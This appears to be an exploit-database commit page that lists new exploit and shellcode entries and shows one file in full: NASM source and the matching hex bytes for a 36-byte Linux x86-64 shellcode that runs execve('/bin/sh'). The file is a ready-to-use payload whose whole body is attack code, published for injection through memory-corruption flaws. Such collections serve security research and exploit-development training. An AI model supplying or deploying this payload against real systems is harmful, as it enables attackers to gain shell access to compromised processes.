
6 changes to exploits/shellcodes/ghdb Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) Linux/x86 - Reverse TCP Shellcode (95 bytes) Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes) Windows 11 x64 - Reverse TCP Shellcode (564 bytes)
31 lines
No EOL
817 B
NASM
31 lines
No EOL
817 B
NASM
# Exploit Title: Linux/x86-64 execve("/bin/sh") Shellcode (36 bytes)
|
|
# Date: 2025-03-23
|
|
# Exploit Author: Sayan Ray [@barebones90]
|
|
# Tested on: Linux x86-64
|
|
# CVE: N/A
|
|
|
|
; P0P SH311 execve ("/bin/sh", NULL, NULL)
|
|
|
|
GLOBAL _start
|
|
|
|
section .text
|
|
|
|
_start:
|
|
xor rax, rax
|
|
push rax
|
|
|
|
mov r10, 0x68732f6e69622f ; hs/nib/
|
|
push r10
|
|
|
|
mov rdi, rsp ; rdi points to the string "/bin/sh" from the stack
|
|
; ( const char *pathname )
|
|
|
|
; Calling execve
|
|
mov rax, 0x3b ; 59 [execve syscall]
|
|
mov rsi, 0 ; NULL ( char *const _Nullable argv[] )
|
|
mov rdx, 0 ; NULL ( char *const _Nullable envp[] )
|
|
syscall
|
|
|
|
; Shellcode:
|
|
; \x48\x31\xc0\x50\x49\xba\x2f\x62\x69\x6e\x2f\x73\x68\x00\x41\x52\x48\x89\xe7\xb8\x3b\x00\x00\x00\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05
|
|
; [Length] : 36 |